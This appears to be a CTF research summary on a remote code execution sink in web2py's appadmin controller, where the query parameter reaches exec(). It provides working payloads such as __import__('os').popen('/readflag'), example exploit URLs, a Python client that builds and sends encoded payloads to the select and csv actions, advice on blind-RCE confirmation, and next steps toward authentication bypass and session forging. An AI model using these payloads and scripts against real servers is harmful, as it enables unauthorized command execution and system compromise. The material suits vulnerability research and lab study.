# Web2py Vulnerability Research - Summary

## Vulnerability Discovered

### RCE in appadmin.py via eval_in_global_env()

**Type**: Remote Code Execution (RCE)  
**Location**: `/web2py/applications/*/controllers/appadmin.py`  
**Lines**: 92-115  
**Authentication**: Required (the controller checks admin credentials before any action runs)

### Technical Details

The `appadmin.py` controller contains an `eval_in_global_env()` function that interpolates caller-supplied text into an `exec()` statement, so the text is run as Python with no sandboxing:

```python
def eval_in_global_env(text):
    exec('_ret=%s' % text, {}, global_env)
    return global_env['_ret']

def get_query(request):
    try:
        return eval_in_global_env(request.vars.query)  # USER INPUT HERE!
    except Exception:
        return None
```

`eval_in_global_env()` is reached through `get_query()`, which two actions in the same controller call with the raw `request.vars.query` value:
1. **`csv()`** (line 170) - `/appadmin/csv/db?query=<payload>`
2. **`select()`** (line 199) - `/appadmin/select/db?query=<payload>`
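To see the two properties of this sink that matter for exploitation, here is a stand-alone reproduction (an added example, not web2py's own code): `global_env` is replaced by a plain dict with a placeholder `db` entry, and the subprocess payload targets the running interpreter instead of `/readflag` so it runs anywhere. It shows that the empty dict passed as globals is not a sandbox (Python inserts `__builtins__` into it, so `__import__` keeps working) and that the bare `except Exception` in `get_query()` turns any error into `None` after the payload's side effect has already fired.

```python
# Added example (not web2py's code): a stand-alone copy of the appadmin
# exec sink, showing why an empty globals dict is not a sandbox and why the
# bare `except Exception` makes a failing payload silent but not harmless.
import os
import sys


def make_global_env():
    """Stand-in for appadmin's global_env. Assumption: in web2py it holds the
    controller's globals (db, request, ...); here only a placeholder `db`."""
    return {"db": "<placeholder DAL object>"}


def eval_in_global_env(text, global_env):
    # Same shape as the sink in appadmin.py. The `{}` passed as globals gets
    # a `__builtins__` entry inserted by the interpreter, so __import__,
    # open, etc. are reachable from the interpolated expression.
    exec("_ret=%s" % text, {}, global_env)
    return global_env["_ret"]


def get_query(query, global_env):
    # Mirrors appadmin.get_query(): every exception is swallowed, so a
    # payload that raises just yields None with nothing sent back.
    try:
        return eval_in_global_env(query, global_env)
    except Exception:
        return None


def demo():
    """Run a few payloads through the sink and report what happened."""
    env = make_global_env()
    out = {}
    # 1. The harmless case the sink was written for.
    out["expr"] = get_query("1 + 1", env)
    # 2. Builtins survive the empty globals dict, so __import__ works.
    out["cwd_matches"] = get_query("__import__('os').getcwd()", env) == os.getcwd()
    # 3. Same shape as the page's subprocess payload, pointed at the current
    #    interpreter instead of /readflag so the example is portable.
    payload = ("__import__('subprocess').check_output([%r, '-c', 'print(42)'], "
               "text=True).strip()" % sys.executable)
    out["subprocess"] = get_query(payload, env)
    # 4. A malformed payload (a statement, not an expression) becomes None ...
    out["syntax_error"] = get_query("import os", env)
    # 5. ... and so does one that raises after its side effect has fired:
    #    the list literal evaluates left to right, so the environment write
    #    happens before 1 / 0 raises. The caller sees None either way.
    os.environ.pop("APPADMIN_DEMO", None)
    raising = ("[__import__('os').environ.__setitem__('APPADMIN_DEMO', 'hit'), "
               "1 / 0][1]")
    out["raising_payload"] = get_query(raising, env)
    out["side_effect_happened"] = os.environ.get("APPADMIN_DEMO") == "hit"
    os.environ.pop("APPADMIN_DEMO", None)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-20s %r" % (key, value))
```

The last two results are the ones that matter for a blind target: the command has already executed by the time `get_query()` returns `None`, so an empty or error-free response says nothing about whether the payload ran.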

### Exploitation

**Payload Format** (the text lands after `_ret=`, so it must be a single Python expression; a statement such as `import os` raises a `SyntaxError` that `get_query()` silently swallows):
```
?query=__import__('os').popen('/readflag').read()
?query=__import__('subprocess').check_output('/readflag', shell=True, text=True)
```

**Example URLs**:
```
https://localhost:5000/welcome/appadmin/select/db?query=__import__('os').popen('id').read()
https://localhost:5000/examples/appadmin/csv/db?query=__import__('os').popen('/readflag').read()
```

The command runs while `exec()` evaluates the expression; the expression's value is then handed back to `select()` or `csv()` as the query, so whether any command output appears in the response depends on what those actions do with it. Treat it as blind RCE: prefer a payload whose effect is observable elsewhere (a file written, an outbound callback, `/readflag` output delivered out of band) before spending time on exfiltration through the rendered page.
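A minimal client for the two actions above, written as an added example rather than one of the page's test scripts. It URL-encodes the payload (the raw URLs above happen to work, but a `+`, `&` or `#` inside a payload would be mangled), refuses to follow redirects so the 303 to the admin login is reported instead of silently replaced by the login page, and accepts a `Cookie` header for when admin credentials are available. `verify_tls=False` is an assumption that the lab target uses a self-signed certificate; none of this is web2py code.

```python
# Added example: request builder and probe for the appadmin query sink.
# Not one of the page's scripts; the target URL and cookie are assumptions.
import ssl
import urllib.error
import urllib.parse
import urllib.request


def build_url(base, app, action, payload, dbname="db"):
    """base is scheme://host:port, app the web2py application name,
    action 'select' or 'csv', payload the Python expression to exec."""
    path = "/%s/appadmin/%s/%s" % (app, action, dbname)
    # safe="" also encodes '/', '+' and '&', which would otherwise be read
    # as path or query separators (e.g. the '/' in '/readflag').
    return "%s%s?query=%s" % (base.rstrip("/"), path,
                              urllib.parse.quote(payload, safe=""))


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so a 303 to the admin login surfaces as
    the response instead of being swapped for the login page."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify(status, location):
    """What a response to the appadmin URL says about the auth gate."""
    if status in (301, 302, 303, 307, 308) and location \
            and "/admin/default/index" in location:
        return "auth_redirect"      # check_credentials() rejected the request
    if status == 200:
        return "reached_action"     # the action ran, so exec() has fired
    return "other:%d" % status


def send(url, cookie=None, verify_tls=False):
    """Return (status, Location header) without following redirects.
    Assumption: the lab target has a self-signed certificate, so TLS
    verification is off by default; pass verify_tls=True anywhere else."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    opener = urllib.request.build_opener(
        NoRedirect(), urllib.request.HTTPSHandler(context=ctx))
    req = urllib.request.Request(url)
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        resp = opener.open(req, timeout=10)
        return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as e:
        # An unfollowed redirect is raised as HTTPError; the status and
        # Location header are still available on the exception object.
        return e.code, e.headers.get("Location")


if __name__ == "__main__":
    url = build_url("https://localhost:5000", "welcome", "select",
                    "__import__('os').popen('/readflag').read()")
    print(url)
    # Pass cookie="<admin session cookie>" once credentials are in hand.
    status, location = send(url)
    print(status, location, classify(status, location))
```

Run it against the lab target and `classify()` returning `auth_redirect` reproduces the blocker described in the next section; `reached_action` means the gate was passed and the payload has executed, whether or not anything visible comes back.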

### Current Blocker: Authentication

Every appadmin action in an application other than `admin` is gated by `gluon.fileutils.check_credentials()` (inside the `admin` application the check is `session.authorized` instead). The check sits at module level in the controller, so it runs before `csv()` or `select()` is even selected:

```python
# Excerpt from appadmin.py; the preceding `if` branch of this chain is omitted.
elif (request.application == 'admin' and not session.authorized) or \
        (request.application != 'admin' and not gluon.fileutils.check_credentials(request)):
    redirect(URL('admin', 'default', 'index',
                 vars=dict(send=URL(args=request.args, vars=request.vars))))
```

**Status**: Returns 303 redirect to admin login when accessed without credentials

### Similarity to React2Shell (CVE-2025-55182)

| React2Shell | Web2py appadmin RCE |
|------------|---------------------|
| Unsafe deserialization in Flight protocol | Unsafe exec() in appadmin |
| User payload → deserialization → RCE | User query → exec() → RCE |
| Unauthenticated by default | **Requires authentication** |
| React Server Components | Web2py admin interface |

### Why This Matches the Challenge

1. ✅ **Stock web2py v3.1.1** - No custom code, real vulnerability
2. ✅ **Similar pattern to React2Shell** - User input → unsafe execution
3. ✅ **RCE capability** - Can execute `/readflag` if accessed
4. ⚠️ **Authentication required** - Need bypass or different entry point

### Possible Next Steps

1. **Find auth bypass** - Look for vulnerabilities in admin authentication
2. **Check default credentials** - Though docker-entrypoint.sh uses random password
3. **Alternative entry point** - Find another function that calls `eval_in_global_env()`
4. **Session exploitation** - Check if sessions can be hijacked/forged
5. **Different vulnerability** - The actual 0-day might be elsewhere

### Files to Review

- ✅ `gluon/restricted.py` - Execution environment
- ✅ `gluon/globals.py` - Session handling  
- ✅ `gluon/utils.py` - secure_loads/secure_dumps
- ✅ `gluon/compileapp.py` - Template compilation
- ✅ `applications/*/controllers/appadmin.py` - RCE found here
- ⏳ `gluon/fileutils.py` - check_credentials() implementation
- ⏳ `applications/admin/*` - Admin authentication flow
- ⏳ `gluon/contrib/*` - Third-party modules

### Test Scripts Created

1. `exploit_appadmin_rce.py` - Exploit script for appadmin RCE (requires auth)
2. `test_appadmin_access.py` - Test authentication status
3. `enumerate_endpoints.py` - Enumerate accessible endpoints  
4. `test_ajax_injection.py` - Test JavaScript injection (negative)
5. `test_cookie_session.py` - Test session cookie exploitation (negative)

## Conclusion

We have identified an RCE sink in web2py's appadmin interface that matches the React2Shell pattern of user input reaching unsafe code execution. It sits behind the admin credential check, however, so an unauthenticated request is redirected before `exec()` is reached. To complete the exploitation we need one of:

- An authentication bypass vulnerability
- A way to reach `eval_in_global_env()` without going through appadmin's credential check
- Verification that this is indeed the intended vulnerability (the CTF scenario might grant elevated privileges)
